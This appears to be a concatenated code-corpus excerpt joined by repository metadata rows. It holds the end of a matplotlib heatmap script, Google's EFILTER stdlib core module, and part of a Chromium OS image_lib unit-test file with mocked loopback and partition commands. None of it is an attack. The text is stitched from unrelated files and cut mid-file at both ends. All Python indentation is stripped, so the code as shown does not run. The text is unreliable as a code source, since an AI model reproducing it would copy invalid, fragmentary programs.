plt.savefig('output/clicks-links_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks_over_links_heatmap_lognormed_self_loop.pdf')
substraction_hist = np.subtract(links_heatmap_hist, clicks_heatmap_hist)
#rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
with np.errstate(divide='ignore', invalid='ignore'):
rel_prob_hist = np.divide(links_heatmap_hist, clicks_heatmap_hist)
rel_prob_hist[rel_prob_hist == np.inf] = 0
rel_prob_hist = np.nan_to_num(rel_prob_hist)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links-clicks_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_over_clicks_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links-clicks_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_over_clicks_heatmap_lognormed_self_loop.pdf')
print "done"
if __name__ == '__main__':
links_heatmap()
clicks_heatmap_first_occ()
clicks_heatmap_total()
clicks_heatmap()
multiple_links_heatmap()
links_heatmap_rel_prob()
| mit | -2,729,897,635,614,966,000 | 29.158863 | 115 | 0.623177 | false |
google/dotty | efilter/stdlib/core.py | 1 | 10013 | # EFILTER Forensic Query Language
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
EFILTER stdlib - core module.
This module defines functions that are always included in every query, as well
as the base classes TypedFunction and LibraryModule, which are used to represent
stdlib functions and modules.
"""
__author__ = "Adam Sindelar <[email protected]>"
import itertools
import six
import threading
from efilter import protocol
from efilter.protocols import applicative
from efilter.protocols import counted
from efilter.protocols import reducer
from efilter.protocols import repeated
from efilter.protocols import structured
class TypedFunction(object):
"""Represents an EFILTER-callable function with reflection support.
Each function in the standard library is an instance of a subclass of
this class. Subclasses override __call__ and the reflection API.
"""
name = None
def apply(self, args, kwargs):
return self(*args, **kwargs)
def __call__(self):
raise NotImplementedError()
@classmethod
def reflect_static_args(cls):
return itertools.repeat(protocol.AnyType)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
applicative.IApplicative.implicit_dynamic(TypedFunction)
class TypedReducer(object):
"""Represents an EFILTER-callable reducer function.
TypedReducer supports the IReducer protocol, but also works as a function
(IApplicative), to allow it to reduce values inside rows in a query.
"""
name = None
# IApplicative
def apply(self, args, kwargs):
return self(*args, **kwargs)
def __call__(self, data, chunk_size=None):
return reducer.reduce(self, data, chunk_size)
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
# IReducer
def fold(self, chunk):
raise NotImplementedError()
def merge(self, left, right):
raise NotImplementedError()
def finalize(self, intermediate):
raise NotImplementedError()
applicative.IApplicative.implicit_dynamic(TypedReducer)
reducer.IReducer.implicit_dynamic(TypedReducer)
class SingletonReducer(object):
"""Preserves a literal value and ensures it's a singleton."""
name = "singleton"
def fold(self, chunk):
iterator = iter(chunk)
first = next(iterator)
for item in iterator:
if item != first:
raise ValueError("All values in a singleton reducer must be "
"equal to each other. Got %r != %r." % (
first, item))
return first
def merge(self, left, right):
if left != right:
raise ValueError("All values in a singleton reducer must be "
"equal to each other. Got %r != %r." % (
left, right))
return left
def finalize(self, intermediate):
return intermediate
class LibraryModule(object):
"""Represents a part of the standard library.
Each library module consists of a collection of vars, which are mostly
instances of TypedFunction. The stdcore module also contains basic types,
such as 'str' or 'int', in addition to functions.
"""
vars = None
name = None
# This is a class-level global storing all instances by their name.
ALL_MODULES = {}
_all_modules_lock = threading.Lock()
def __init__(self, vars, name):
self.vars = vars
self.name = name
self._all_modules_lock.acquire()
try:
if name in self.ALL_MODULES:
raise ValueError("Duplicate module name %r." % name)
self.ALL_MODULES[name] = self
finally:
self._all_modules_lock.release()
def __del__(self):
"""If modules are being used properly this will only happen on exit."""
self._all_modules_lock.acquire()
try:
del self.ALL_MODULES[self.name]
finally:
self._all_modules_lock.release()
def __repr__(self):
return "LibraryModule(name=%r, vars=%r)" % (self.name, self.vars)
def getmembers_runtime(self):
return self.vars.keys()
def resolve(self, name):
return self.vars[name]
def reflect_runtime_member(self, name):
return type(self.vars[name])
structured.IStructured.implicit_static(LibraryModule)
class First(TypedFunction):
"""Return the first value from an IRepeated."""
name = "first"
def __call__(self, x):
for value in repeated.getvalues(x):
return value
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return protocol.AnyType
class Take(TypedFunction):
"""Take only the first 'count' elements from 'x' (tuple or IRepeated).
This implementation is lazy.
Example:
take(2, (1, 2, 3, 4)) -> (1, 2)
Arguments:
count: How many elements to return.
x: The tuple or IRepeated to take from.
Returns:
A lazy IRepeated.
"""
name = "take"
def __call__(self, count, x):
def _generator():
if isinstance(x, tuple):
values = x
else:
values = repeated.getvalues(x)
for idx, value in enumerate(values):
if idx == count:
break
yield value
return repeated.lazy(_generator)
@classmethod
def reflect_static_args(cls):
return (int, repeated.IRepeated)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Drop(TypedFunction):
"""Drop the first 'count' elements from 'x' (tuple or IRepeated).
This implementation is lazy.
Example:
drop(2, (1, 2, 3, 4)) -> (3, 4)
Arguments:
count: How many elements to drop.
x: The tuple or IRepeated to drop from.
Returns:
A lazy IRepeated.
"""
name = "drop"
def __call__(self, count, x):
def _generator():
if isinstance(x, tuple):
values = x
else:
values = repeated.getvalues(x)
for idx, value in enumerate(values):
if idx < count:
continue
yield value
return repeated.lazy(_generator)
@classmethod
def reflect_static_args(cls):
return (int, repeated.IRepeated)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Lower(TypedFunction):
"""Make a string lowercase."""
name = "lower"
def __call__(self, x):
return x.lower()
@classmethod
def reflect_static_args(cls):
return (six.string_types[0],)
@classmethod
def reflect_static_return(cls):
return six.string_types[0]
class Find(TypedFunction):
"""Returns the position of 'needle' in 'string', or -1 if not found."""
name = "find"
def __call__(self, string, needle):
return string.find(needle)
@classmethod
def reflect_static_args(cls):
return (six.string_types[0], six.string_types[0])
@classmethod
def reflect_static_return(cls):
return int
class Count(TypedReducer):
"""Counts the number of elements in a tuple or of values in a repeated."""
name = "count"
def fold(self, chunk):
return counted.count(chunk)
def merge(self, left, right):
return left + right
def finalize(self, intermediate):
return intermediate
@classmethod
def reflect_static_return(cls):
return int
class Reverse(TypedFunction):
"""Reverse a tuple of a repeated and maintains the type."""
name = "reverse"
def __call__(self, x):
if isinstance(x, tuple):
return tuple(reversed(x))
return repeated.meld(*reversed(repeated.getvalues(x)))
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
class Materialize(TypedFunction):
"""Force a repeated value (e.g. output of map) to materialize in memory."""
name = "materialize"
def __call__(self, rv):
return repeated.repeated(*list(rv))
@classmethod
def reflect_static_args(cls):
return (repeated.IRepeated,)
@classmethod
def reflect_static_return(cls):
return repeated.IRepeated
MODULE = LibraryModule(name="stdcore",
vars={Take.name: Take(),
Drop.name: Drop(),
Count.name: Count(),
Reverse.name: Reverse(),
Lower.name: Lower(),
Find.name: Find(),
SingletonReducer.name: SingletonReducer(),
First.name: First(),
Materialize.name: Materialize(),
# Built-in types below:
"int": int,
"str": six.text_type,
"bytes": six.binary_type,
"float": float})
| apache-2.0 | 3,722,554,393,945,833,500 | 24.478372 | 80 | 0.602517 | false |
endlessm/chromium-browser | third_party/chromite/lib/image_lib_unittest.py | 1 | 25414 | # -*- coding: utf-8 -*-
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Test the image_lib module."""
from __future__ import print_function
import collections
import gc
import glob
import os
import stat
import mock
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import image_lib
from chromite.lib import osutils
from chromite.lib import retry_util
from chromite.lib import partial_mock
# pylint: disable=protected-access
class FakeException(Exception):
"""Fake exception used for testing exception handling."""
FAKE_PATH = '/imaginary/file'
LOOP_DEV = '/dev/loop9999'
LOOP_PART_COUNT = 12
LOOP_PARTITION_INFO = [
image_lib.PartitionInfo(
1, 2928640, 2957311, 28672, 14680064, 'STATE', ''),
image_lib.PartitionInfo(
2, 20480, 53247, 32768, 16777216, 'KERN-A', ''),
image_lib.PartitionInfo(
3, 286720, 2928639, 2641920, 1352663040, 'ROOT-A', ''),
image_lib.PartitionInfo(
4, 53248, 86015, 32768, 16777216, 'KERN-B', ''),
image_lib.PartitionInfo(
5, 282624, 286719, 4096, 2097152, 'ROOT-B', ''),
image_lib.PartitionInfo(
6, 16448, 16448, 1, 512, 'KERN-C', ''),
image_lib.PartitionInfo(
7, 16449, 16449, 1, 512, 'ROOT-C', ''),
image_lib.PartitionInfo(
8, 86016, 118783, 32768, 16777216, 'OEM', ''),
image_lib.PartitionInfo(
9, 16450, 16450, 1, 512, 'reserved', ''),
image_lib.PartitionInfo(
10, 16451, 16451, 1, 512, 'reserved', ''),
image_lib.PartitionInfo(
11, 64, 16447, 16384, 8388608, 'RWFW', ''),
image_lib.PartitionInfo(
12, 249856, 282623, 32768, 16777216, 'EFI-SYSTEM', ''),
]
LOOP_PARTS_DICT = {
p.number: '%sp%d' % (LOOP_DEV, p.number) for p in LOOP_PARTITION_INFO}
LOOP_PARTS_LIST = LOOP_PARTS_DICT.values()
class LoopbackPartitionsMock(image_lib.LoopbackPartitions):
"""Mocked loopback partition class to use in unit tests."""
# pylint: disable=super-init-not-called
def __init__(self, path, destination=None, part_ids=None, mount_opts=None,
dev=LOOP_DEV, part_count=0):
"""Initialize.
Args:
(shared with LoopbackPartitions)
path: Path to the image file.
destination: destination directory.
part_ids: Mount these partitions at context manager entry.
mount_opts: Use these mount_opts for mounting |part_ids|.
(unique to LoopbackPartitionsMock)
dev: Path for the base loopback device.
part_count: How many partition device files to make up. Default: normal
partition table.
"""
self.path = path
self.dev = dev
self.part_ids = part_ids
self.mount_opts = mount_opts
if destination:
self.destination = destination
else:
self.destination = osutils.TempDir()
if part_count:
self._gpt_table = [
image_lib.PartitionInfo(num, 0, 0, 0, '', 'my-%d' % num, '')
for num in range(1, part_count + 1)]
else:
self._gpt_table = LOOP_PARTITION_INFO
self.parts = {p.number: '%sp%s' % (dev, p.number)
for p in self._gpt_table}
self.enable_rw_called = set()
self.disable_rw_called = set()
# pylint: enable=super-init-not-called
def EnableRwMount(self, part_id, offset=0):
"""Stub out enable rw mount."""
self.enable_rw_called.add((part_id, offset))
def DisableRwMount(self, part_id, offset=0):
"""Stub out disable rw mount."""
self.disable_rw_called.add((part_id, offset))
def _Mount(self, part, mount_opts):
"""Stub out mount operations."""
dest_number, _ = self._GetMountPointAndSymlink(part)
# Don't actually even try to mount it, let alone mark it mounted.
return dest_number
def _Unmount(self, part):
"""Stub out unmount operations."""
def close(self):
pass
class LoopbackPartitionsTest(cros_test_lib.MockTempDirTestCase):
"""Test the loopback partitions class"""
def setUp(self):
self.rc_mock = cros_test_lib.RunCommandMock()
self.StartPatcher(self.rc_mock)
self.rc_mock.SetDefaultCmdResult()
self.rc_mock.AddCmdResult(partial_mock.In('--show'), output=LOOP_DEV)
self.PatchObject(image_lib, 'GetImageDiskPartitionInfo',
return_value=LOOP_PARTITION_INFO)
self.PatchObject(glob, 'glob', return_value=LOOP_PARTS_LIST)
self.mount_mock = self.PatchObject(osutils, 'MountDir')
self.umount_mock = self.PatchObject(osutils, 'UmountDir')
self.retry_mock = self.PatchObject(retry_util, 'RetryException')
def fake_which(val, *_arg, **_kwargs):
return val
self.PatchObject(osutils, 'Which', side_effect=fake_which)
def testContextManager(self):
"""Test using the loopback class as a context manager."""
with image_lib.LoopbackPartitions(FAKE_PATH) as lb:
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testContextManagerWithMounts(self):
"""Test using the loopback class as a context manager with mounts."""
syml = self.PatchObject(osutils, 'SafeSymlink')
part_ids = (1, 'ROOT-A')
with image_lib.LoopbackPartitions(
FAKE_PATH, part_ids=part_ids, mount_opts=('ro',)) as lb:
expected_mounts = set()
expected_calls = []
for part_id in part_ids:
for part in LOOP_PARTITION_INFO:
if part.name == part_id or part.number == part_id:
expected_mounts.add(part)
expected_calls.append(
mock.call('dir-%d' % part.number, os.path.join(
lb.destination, 'dir-%s' % part.name)))
break
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
self.assertEqual(expected_calls, syml.call_args_list)
self.assertEqual(expected_mounts, lb._mounted)
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testManual(self):
"""Test using the loopback class closed manually."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
lb.close()
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def gcFunc(self):
"""This function isolates a local variable so it'll be garbage collected."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
self.rc_mock.assertCommandContains(['losetup', '--show', '-f', FAKE_PATH])
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['partx', '-a', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV],
expected=False)
self.assertEqual(lb.parts, LOOP_PARTS_DICT)
self.assertEqual(lb._gpt_table, LOOP_PARTITION_INFO)
def testGarbageCollected(self):
"""Test using the loopback class closed by garbage collection."""
self.gcFunc()
# Force garbage collection in case python didn't already clean up the
# loopback object.
gc.collect()
self.rc_mock.assertCommandContains(['partx', '-d', LOOP_DEV])
self.rc_mock.assertCommandContains(['losetup', '--detach', LOOP_DEV])
def testMountUnmount(self):
"""Test Mount() and Unmount() entry points."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
# Mount four partitions.
lb.Mount((1, 3, 'ROOT-B', 'ROOT-C'))
for p in (1, 3, 5, 7):
self.mount_mock.assert_any_call(
'%sp%d' % (LOOP_DEV, p), '%s/dir-%d' % (self.tempdir, p),
makedirs=True, skip_mtab=False, sudo=True, mount_opts=('ro',))
linkname = '%s/dir-%s' % (self.tempdir, LOOP_PARTITION_INFO[p - 1].name)
self.assertTrue(stat.S_ISLNK(os.lstat(linkname).st_mode))
self.assertEqual(4, self.mount_mock.call_count)
self.umount_mock.assert_not_called()
# Unmount half of them, confirm that they were unmounted.
lb.Unmount((1, 'ROOT-B'))
for p in (1, 5):
self.umount_mock.assert_any_call('%s/dir-%d' % (self.tempdir, p),
cleanup=False)
self.assertEqual(2, self.umount_mock.call_count)
self.umount_mock.reset_mock()
# Close the object, so that we unmount the other half of them.
lb.close()
for p in (3, 7):
self.umount_mock.assert_any_call('%s/dir-%d' % (self.tempdir, p),
cleanup=False)
self.assertEqual(2, self.umount_mock.call_count)
# Verify that the directories were cleaned up.
for p in (1, 3):
self.retry_mock.assert_any_call(
cros_build_lib.RunCommandError, 60, osutils.RmDir,
'%s/dir-%d' % (self.tempdir, p), sudo=True, sleep=1)
def testMountingMountedPartReturnsName(self):
"""Test that Mount returns the directory name even when already mounted."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
dirname = '%s/dir-%d' % (self.tempdir, lb._gpt_table[0].number)
# First make sure we get the directory name when we actually mount.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
# Then make sure we get it when we call it again.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
lb.close()
def testRemountCallsMount(self):
"""Test that Mount returns the directory name even when already mounted."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
devname = '%sp%d' % (LOOP_DEV, lb._gpt_table[0].number)
dirname = '%s/dir-%d' % (self.tempdir, lb._gpt_table[0].number)
# First make sure we get the directory name when we actually mount.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('ro',)))
self.mount_mock.assert_called_once_with(
devname, dirname,
makedirs=True, skip_mtab=False, sudo=True, mount_opts=('ro',))
# Then make sure we get it when we call it again.
self.assertEqual(dirname, lb._Mount(lb._gpt_table[0], ('remount', 'rw')))
self.assertEqual(
mock.call(devname, dirname, makedirs=True, skip_mtab=False,
sudo=True, mount_opts=('remount', 'rw')),
self.mount_mock.call_args)
lb.close()
def testGetPartitionDevName(self):
"""Test GetPartitionDevName()."""
lb = image_lib.LoopbackPartitions(FAKE_PATH)
for part in LOOP_PARTITION_INFO:
self.assertEqual('%sp%d' % (LOOP_DEV, part.number),
lb.GetPartitionDevName(part.number))
if part.name != 'reserved':
self.assertEqual('%sp%d' % (LOOP_DEV, part.number),
lb.GetPartitionDevName(part.name))
lb.close()
def test_GetMountPointAndSymlink(self):
"""Test _GetMountPointAndSymlink()."""
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
for part in LOOP_PARTITION_INFO:
expected = [os.path.join(lb.destination, 'dir-%s' % n)
for n in (part.number, part.name)]
self.assertEqual(expected, list(lb._GetMountPointAndSymlink(part)))
lb.close()
def testIsExt2OnVarious(self):
"""Test _IsExt2 works with the various partition types."""
FS_PARTITIONS = (1, 3, 8)
# STATE, ROOT-A, and OEM generally have ext2 filesystems.
for x in FS_PARTITIONS:
self.rc_mock.AddCmdResult(
partial_mock.In('if=%sp%d' % (LOOP_DEV, x)),
output=b'\x53\xef')
# Throw errors on all of the partitions that are < 1000 bytes.
for part in LOOP_PARTITION_INFO:
if part.size < 1000:
self.rc_mock.AddCmdResult(
partial_mock.In('if=%sp%d' % (LOOP_DEV, part.number)),
returncode=1, error='Seek failed\n')
lb = image_lib.LoopbackPartitions(FAKE_PATH, destination=self.tempdir)
# We expect that only the partitions in FS_PARTITIONS are ext2.
self.assertEqual(
[part.number in FS_PARTITIONS for part in LOOP_PARTITION_INFO],
[lb._IsExt2(part.name) for part in LOOP_PARTITION_INFO])
lb.close()
class LsbUtilsTest(cros_test_lib.MockTempDirTestCase):
"""Tests the various LSB utilities."""
def setUp(self):
# Patch os.getuid(..) to pretend running as root, so reading/writing the
# lsb-release file doesn't require escalated privileges and the test can
# clean itself up correctly.
self.PatchObject(os, 'getuid', return_value=0)
def testWriteLsbRelease(self):
"""Tests writing out the lsb_release file using WriteLsbRelease(..)."""
rc_mock = self.PatchObject(cros_build_lib, 'sudo_run')
fields = collections.OrderedDict((
('x', '1'), ('y', '2'), ('foo', 'bar'),
))
image_lib.WriteLsbRelease(self.tempdir, fields)
lsb_release_file = os.path.join(self.tempdir, 'etc', 'lsb-release')
expected_content = 'x=1\ny=2\nfoo=bar\n'
self.assertFileContents(lsb_release_file, expected_content)
rc_mock.assert_called_once_with([
'setfattr', '-n', 'security.selinux', '-v',
'u:object_r:cros_conf_file:s0',
os.path.join(self.tempdir, 'etc/lsb-release')])
# Test that WriteLsbRelease(..) correctly handles an existing file.
rc_mock = self.PatchObject(cros_build_lib, 'sudo_run')
fields = collections.OrderedDict((
('newkey1', 'value1'), ('newkey2', 'value2'), ('a', '3'), ('b', '4'),
))
image_lib.WriteLsbRelease(self.tempdir, fields)
expected_content = ('x=1\ny=2\nfoo=bar\nnewkey1=value1\nnewkey2=value2\n'
'a=3\nb=4\n')
self.assertFileContents(lsb_release_file, expected_content)
rc_mock.assert_called_once_with([
'setfattr', '-n', 'security.selinux', '-v',
'u:object_r:cros_conf_file:s0',
os.path.join(self.tempdir, 'etc/lsb-release')])
class BuildImagePathTest(cros_test_lib.MockTempDirTestCase):
"""BuildImagePath tests."""
def setUp(self):
self.board = 'board'
self.board_dir = os.path.join(self.tempdir, self.board)
D = cros_test_lib.Directory
filesystem = (
D(self.board, ('recovery_image.bin', 'other_image.bin')),
'full_path_image.bin',
)
cros_test_lib.CreateOnDiskHierarchy(self.tempdir, filesystem)
self.full_path = os.path.join(self.tempdir, 'full_path_image.bin')
def testBuildImagePath(self):
"""BuildImagePath tests."""
self.PatchObject(image_lib, 'GetLatestImageLink',
return_value=os.path.join(self.tempdir, self.board))
# Board and full image path provided.
result = image_lib.BuildImagePath(self.board, self.full_path)
self.assertEqual(self.full_path, result)
# Only full image path provided.
result = image_lib.BuildImagePath(None, self.full_path)
self.assertEqual(self.full_path, result)
# Full image path provided that does not exist.
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(self.board, '/does/not/exist')
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(None, '/does/not/exist')
# Default image is used.
result = image_lib.BuildImagePath(self.board, None)
self.assertEqual(os.path.join(self.board_dir, 'recovery_image.bin'), result)
# Image basename provided.
result = image_lib.BuildImagePath(self.board, 'other_image.bin')
self.assertEqual(os.path.join(self.board_dir, 'other_image.bin'), result)
# Image basename provided that does not exist.
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(self.board, 'does_not_exist.bin')
default_mock = self.PatchObject(cros_build_lib, 'GetDefaultBoard')
# Nothing provided, and no default.
default_mock.return_value = None
with self.assertRaises(image_lib.ImageDoesNotExistError):
image_lib.BuildImagePath(None, None)
# Nothing provided, with default.
default_mock.return_value = 'board'
result = image_lib.BuildImagePath(None, None)
self.assertEqual(os.path.join(self.board_dir, 'recovery_image.bin'), result)
class SecurityTestConfigTest(cros_test_lib.RunCommandTempDirTestCase):
"""SecurityTestConfig class tests."""
# pylint: disable=protected-access
def setUp(self):
self.image = '/path/to/image.bin'
self.baselines = '/path/to/baselines'
self.vboot_hash = 'abc123'
self.config = image_lib.SecurityTestConfig(self.image, self.baselines,
self.vboot_hash, self.tempdir)
def testVbootCheckout(self):
"""Test normal flow - clone and checkout."""
clone_patch = self.PatchObject(git, 'Clone')
self.config._VbootCheckout()
clone_patch.assert_called_once()
self.assertCommandContains(['git', 'checkout', self.vboot_hash])
# Make sure it doesn't try to clone & checkout again after already having
# done so successfully.
clone_patch = self.PatchObject(git, 'Clone')
self.config._VbootCheckout()
clone_patch.assert_not_called()
def testVbootCheckoutError(self):
"""Test exceptions in a git command."""
rce = cros_build_lib.RunCommandError('error')
self.PatchObject(git, 'Clone', side_effect=rce)
with self.assertRaises(image_lib.VbootCheckoutError):
self.config._VbootCheckout()
def testVbootCheckoutNoDirectory(self):
"""Test the error handling when the directory does not exist."""
# Test directory that does not exist.
self.config.directory = '/DOES/NOT/EXIST'
with self.assertRaises(image_lib.SecurityConfigDirectoryError):
self.config._VbootCheckout()
def testRunCheck(self):
"""RunCheck tests."""
# No config argument when running check.
self.config.RunCheck('check1', False)
check1 = os.path.join(self.config._checks_dir, 'ensure_check1.sh')
config1 = os.path.join(self.baselines, 'ensure_check1.config')
self.assertCommandContains([check1, self.image])
self.assertCommandContains([config1], expected=False)
# Include config argument when running check.
self.config.RunCheck('check2', True)
check2 = os.path.join(self.config._checks_dir, 'ensure_check2.sh')
config2 = os.path.join(self.baselines, 'ensure_check2.config')
self.assertCommandContains([check2, self.image, config2])
class GetImageDiskPartitionInfoTests(cros_test_lib.RunCommandTestCase):
"""Tests the GetImageDiskPartitionInfo function."""
SAMPLE_PARTED = """/foo/chromiumos_qemu_image.bin:\
2271240192B:file:512:512:gpt::;
11:32768B:8421375B:8388608B::RWFW:;
6:8421376B:8421887B:512B::KERN-C:;
7:8421888B:8422399B:512B::ROOT-C:;
9:8422400B:8422911B:512B::reserved:;
10:8422912B:8423423B:512B::reserved:;
2:10485760B:27262975B:16777216B::KERN-A:;
4:27262976B:44040191B:16777216B::KERN-B:;
8:44040192B:60817407B:16777216B:ext4:OEM:msftdata;
12:127926272B:161480703B:33554432B:fat16:EFI-SYSTEM:boot, esp;
5:161480704B:163577855B:2097152B::ROOT-B:;
3:163577856B:2260729855B:2097152000B:ext2:ROOT-A:;
1:2260729856B:2271215615B:10485760B:ext2:STATE:msftdata;
"""
SAMPLE_CGPT = """
start size part contents
0 1 PMBR (Boot GUID: 88FB7EB8-2B3F-B943-B933-\
EEC571FFB6E1)
1 1 Pri GPT header
2 32 Pri GPT table
1921024 2097152 1 Label: "STATE"
Type: Linux data
UUID: EEBD83BE-397E-BD44-878B-0DDDD5A5C510
20480 32768 2 Label: "KERN-A"
Type: ChromeOS kernel
UUID: 7007C2F3-08E5-AB40-A4BC-FF5B01F5460D
Attr: priority=15 tries=15 successful=1
1101824 819200 3 Label: "ROOT-A"
Type: ChromeOS rootfs
UUID: F4C5C3AD-027F-894B-80CD-3DEC57932948
53248 32768 4 Label: "KERN-B"
Type: ChromeOS kernel
UUID: C85FB478-404C-8741-ADB8-11312A35880D
Attr: priority=0 tries=0 successful=0
282624 819200 5 Label: "ROOT-B"
Type: ChromeOS rootfs
UUID: A99F4231-1EC3-C542-AC0C-DF3729F5DB07
16448 1 6 Label: "KERN-C"
Type: ChromeOS kernel
UUID: 81F0E336-FAC9-174D-A08C-864FE627B637
Attr: priority=0 tries=0 successful=0
16449 1 7 Label: "ROOT-C"
Type: ChromeOS rootfs
UUID: 9E127FCA-30C1-044E-A5F2-DF74E6932692
86016 32768 8 Label: "OEM"
Type: Linux data
UUID: 72986347-A37C-684F-9A19-4DBAF41C55A9
16450 1 9 Label: "reserved"
Type: ChromeOS reserved
UUID: BA85A0A7-1850-964D-8EF8-6707AC106C3A
16451 1 10 Label: "reserved"
Type: ChromeOS reserved
UUID: 16C9EC9B-50FA-DD46-98DC-F781360817B4
64 16384 11 Label: "RWFW"
Type: ChromeOS firmware
UUID: BE8AECB9-4F78-7C44-8F23-5A9273B7EC8F
249856 32768 12 Label: "EFI-SYSTEM"
Type: EFI System Partition
UUID: 88FB7EB8-2B3F-B943-B933-EEC571FFB6E1
4050847 32 Sec GPT table
4050879 1 Sec GPT header
"""
def testCgpt(self):
"""Tests that we can list all partitions with `cgpt` correctly."""
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_CGPT)
partitions = image_lib.GetImageDiskPartitionInfo('...')
part_dict = {p.name: p for p in partitions}
self.assertEqual(part_dict['STATE'].start, 983564288)
self.assertEqual(part_dict['STATE'].size, 1073741824)
self.assertEqual(part_dict['STATE'].number, 1)
self.assertEqual(part_dict['STATE'].name, 'STATE')
self.assertEqual(part_dict['EFI-SYSTEM'].start, 249856 * 512)
self.assertEqual(part_dict['EFI-SYSTEM'].size, 32768 * 512)
self.assertEqual(part_dict['EFI-SYSTEM'].number, 12)
self.assertEqual(part_dict['EFI-SYSTEM'].name, 'EFI-SYSTEM')
self.assertEqual(12, len(partitions))
def testNormalPath(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=False)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_PARTED)
partitions = image_lib.GetImageDiskPartitionInfo('_ignored')
part_dict = {p.name: p for p in partitions}
self.assertEqual(12, len(partitions))
self.assertEqual(1, part_dict['STATE'].number)
self.assertEqual(2097152000, part_dict['ROOT-A'].size)
def testKeyedByNumber(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=False)
